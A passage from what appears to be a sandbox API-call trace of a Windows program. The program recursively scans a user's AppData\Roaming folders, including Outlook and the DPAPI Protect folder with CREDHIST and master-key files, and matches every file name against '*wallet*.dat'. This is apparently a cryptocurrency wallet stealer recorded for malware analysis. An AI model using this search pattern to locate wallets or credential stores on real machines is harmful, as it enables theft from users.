lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x4eb090 [0175.371] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0175.371] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80f81d62, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80f81d62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80f83167, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x9362, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0175.371] wsprintfA (in: param_1=0x19756c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 66 [0175.371] wsprintfA (in: param_1=0x197674, param_2="%s\\%s" | out: param_1="Microsoft\\Office\\MSO1033.acl") returned 28 [0175.371] PathMatchSpecA (pszFile="MSO1033.acl", pszSpec="*wallet*.dat") returned 0 [0175.371] wsprintfA (in: param_1=0x19723c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl\\*") returned 68 [0175.371] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\office\\mso1033.acl\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x80f81d62, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80f81d62, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x80f83167, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x9362, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x53004d, cFileName="O", cAlternateFileName="")) returned 0xffffffff [0175.372] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4689310, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="Recent", cAlternateFileName="")) returned 1 [0175.372] wsprintfA (in: param_1=0x19756c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned 61 [0175.372] wsprintfA (in: param_1=0x197674, param_2="%s\\%s" | out: param_1="Microsoft\\Office\\Recent") returned 23 [0175.372] PathMatchSpecA (pszFile="Recent", pszSpec="*wallet*.dat") returned 0 [0175.372] wsprintfA (in: param_1=0x19723c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned 63 [0175.372] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\office\\recent\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4eb1d0 [0175.372] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.372] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xa481d59b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa481d59b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1c, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="index.dat", cAlternateFileName="")) returned 1 [0175.372] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 71 [0175.372] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Office\\Recent\\index.dat") returned 33 [0175.372] PathMatchSpecA (pszFile="index.dat", pszSpec="*wallet*.dat") returned 0 [0175.372] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat\\*") returned 73 [0175.373] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\office\\recent\\index.dat\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0xa481d59b, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0xa481d59b, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xa481d59b, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1c, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x6e0069, cFileName="d", cAlternateFileName="C")) returned 0xffffffff [0175.373] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4689310, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4ab, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 1 [0175.373] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 75 [0175.373] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Office\\Recent\\Templates.LNK") returned 37 [0175.373] PathMatchSpecA (pszFile="Templates.LNK", pszSpec="*wallet*.dat") returned 0 [0175.373] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK\\*") returned 77 [0175.373] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0xa4689310, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0xa4689310, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xa481d59b, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x4ab, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x650054, cFileName="m", cAlternateFileName="C")) returned 0xffffffff [0175.373] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4689310, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa481d59b, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4ab, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 0 [0175.373] FindClose (in: hFindFile=0x4eb1d0 | out: hFindFile=0x4eb1d0) returned 1 [0175.373] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4689310, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="Recent", cAlternateFileName="")) returned 0 [0175.373] FindClose (in: hFindFile=0x4eb090 | out: hFindFile=0x4eb090) returned 1 [0175.373] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x877953e5, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0175.373] wsprintfA (in: param_1=0x197bf4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook") returned 55 [0175.373] wsprintfA (in: param_1=0x197cfc, param_2="%s\\%s" | out: param_1="Microsoft\\Outlook") returned 17 [0175.373] PathMatchSpecA (pszFile="Outlook", pszSpec="*wallet*.dat") returned 0 [0175.373] wsprintfA (in: param_1=0x1978c4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned 57 [0175.373] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\outlook\\*"), lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x877953e5, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x4eb1d0 [0175.461] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x877953e5, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0175.462] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6abbe5b6, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6abbe5b6, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6acd6e90, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0175.462] wsprintfA (in: param_1=0x19756c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 67 [0175.462] wsprintfA (in: param_1=0x197674, param_2="%s\\%s" | out: param_1="Microsoft\\Outlook\\Outlook.srs") returned 29 [0175.462] PathMatchSpecA (pszFile="Outlook.srs", pszSpec="*wallet*.dat") returned 0 [0175.462] wsprintfA (in: param_1=0x19723c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs\\*") returned 69 [0175.462] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\outlook\\outlook.srs\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x6abbe5b6, ftCreationTime.dwLowDateTime=0x1d70699, ftCreationTime.dwHighDateTime=0x6abbe5b6, ftLastAccessTime.dwLowDateTime=0x1d70699, ftLastAccessTime.dwHighDateTime=0x6acd6e90, ftLastWriteTime.dwLowDateTime=0x1d70699, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xa00, nFileSizeLow=0x4ab, dwReserved0=0x207d0, dwReserved1=0x75004f, cFileName="t", cAlternateFileName="TEMPLA~1Ð\x07\x02")) returned 0xffffffff [0175.462] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x877953e5, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x877953e5, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x8864a351, ftLastWriteTime.dwHighDateTime=0x1d8a651, nFileSizeHigh=0x0, nFileSizeLow=0x956, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName="Outlook.xml", cAlternateFileName="")) returned 1 [0175.462] wsprintfA (in: param_1=0x19756c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 67 [0175.462] wsprintfA (in: param_1=0x197674, param_2="%s\\%s" | out: param_1="Microsoft\\Outlook\\Outlook.xml") returned 29 [0175.462] PathMatchSpecA (pszFile="Outlook.xml", pszSpec="*wallet*.dat") returned 0 [0175.462] wsprintfA (in: param_1=0x19723c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml\\*") returned 69 [0175.462] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\outlook\\outlook.xml\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x877953e5, ftCreationTime.dwLowDateTime=0x1d70699, ftCreationTime.dwHighDateTime=0x877953e5, ftLastAccessTime.dwLowDateTime=0x1d70699, ftLastAccessTime.dwHighDateTime=0x8864a351, ftLastWriteTime.dwLowDateTime=0x1d8a651, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x956, nFileSizeLow=0x4ab, dwReserved0=0x207d0, dwReserved1=0x75004f, cFileName="t", cAlternateFileName="TEMPLA~1Ð\x07\x02")) returned 0xffffffff [0175.462] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x877953e5, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x877953e5, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x8864a351, ftLastWriteTime.dwHighDateTime=0x1d8a651, nFileSizeHigh=0x0, nFileSizeLow=0x956, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName="Outlook.xml", cAlternateFileName="")) returned 0 [0175.463] FindClose (in: hFindFile=0x4eb1d0 | out: hFindFile=0x4eb1d0) returned 1 [0175.463] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x956, dwReserved1=0x4ab, cFileName="Protect", cAlternateFileName="")) returned 1 [0175.463] wsprintfA (in: param_1=0x197bf4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect") returned 55 [0175.463] wsprintfA (in: param_1=0x197cfc, param_2="%s\\%s" | out: param_1="Microsoft\\Protect") returned 17 [0175.463] PathMatchSpecA (pszFile="Protect", pszSpec="*wallet*.dat") returned 0 [0175.463] wsprintfA (in: param_1=0x1978c4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\*") returned 57 [0175.463] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\protect\\*"), lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x50866c1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x4eb090 [0175.463] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x50866c1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0175.463] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xcf68faea, ftLastWriteTime.dwHighDateTime=0x1d85953, nFileSizeHigh=0x0, nFileSizeLow=0x258, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0175.463] wsprintfA (in: param_1=0x19756c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 64 [0175.463] wsprintfA (in: param_1=0x197674, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\CREDHIST") returned 26 [0175.463] PathMatchSpecA (pszFile="CREDHIST", pszSpec="*wallet*.dat") returned 0 [0175.463] wsprintfA (in: param_1=0x19723c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST\\*") returned 66 [0175.464] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\protect\\credhist\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x44792966, ftCreationTime.dwLowDateTime=0x1d70068, ftCreationTime.dwHighDateTime=0x44792966, ftLastAccessTime.dwLowDateTime=0x1d70068, ftLastAccessTime.dwHighDateTime=0xcf68faea, ftLastWriteTime.dwLowDateTime=0x1d85953, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x258, nFileSizeLow=0x4ab, dwReserved0=0x207d0, dwReserved1=0x520043, cFileName="E", cAlternateFileName="TEMPLA~1Ð\x07\x02")) returned 0xffffffff [0175.464] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x50866c1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8060823c, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x8060823c, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4ab, dwReserved1=0x207d0, cFileName="S-1-5-21-1560258661-3990802383-1811730007-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0175.464] wsprintfA (in: param_1=0x19756c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000") returned 102 [0175.464] wsprintfA (in: param_1=0x197674, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000") returned 64 [0175.464] PathMatchSpecA (pszFile="S-1-5-21-1560258661-3990802383-1811730007-1000", pszSpec="*wallet*.dat") returned 0 [0175.464] wsprintfA (in: param_1=0x19723c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\*") returned 104 [0175.464] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1560258661-3990802383-1811730007-1000\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x50866c1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8060823c, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x8060823c, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4eb1d0 [0175.464] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x50866c1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8060823c, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x8060823c, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.464] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8060823c, ftCreationTime.dwHighDateTime=0x1d8a649, ftLastAccessTime.dwLowDateTime=0x8060823c, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x80627df0, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="1c1d304f-aa8f-4534-b2cb-33b61c83ed15", cAlternateFileName="1C1D30~1")) returned 1 [0175.464] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\1c1d304f-aa8f-4534-b2cb-33b61c83ed15") returned 139 [0175.464] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\1c1d304f-aa8f-4534-b2cb-33b61c83ed15") returned 101 [0175.464] PathMatchSpecA (pszFile="1c1d304f-aa8f-4534-b2cb-33b61c83ed15", pszSpec="*wallet*.dat") returned 0 [0175.465] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\1c1d304f-aa8f-4534-b2cb-33b61c83ed15\\*") returned 141 [0175.465] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\1c1d304f-aa8f-4534-b2cb-33b61c83ed15\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1560258661-3990802383-1811730007-1000\\1c1d304f-aa8f-4534-b2cb-33b61c83ed15\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x8060823c, ftCreationTime.dwLowDateTime=0x1d8a649, ftCreationTime.dwHighDateTime=0x8060823c, ftLastAccessTime.dwLowDateTime=0x1d8a649, ftLastAccessTime.dwHighDateTime=0x80627df0, ftLastWriteTime.dwLowDateTime=0x1d8a649, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1d4, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x630031, cFileName="1", cAlternateFileName="C")) returned 0xffffffff [0175.465] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x562658a2, ftCreationTime.dwHighDateTime=0x1d82a22, ftLastAccessTime.dwLowDateTime=0x562658a2, 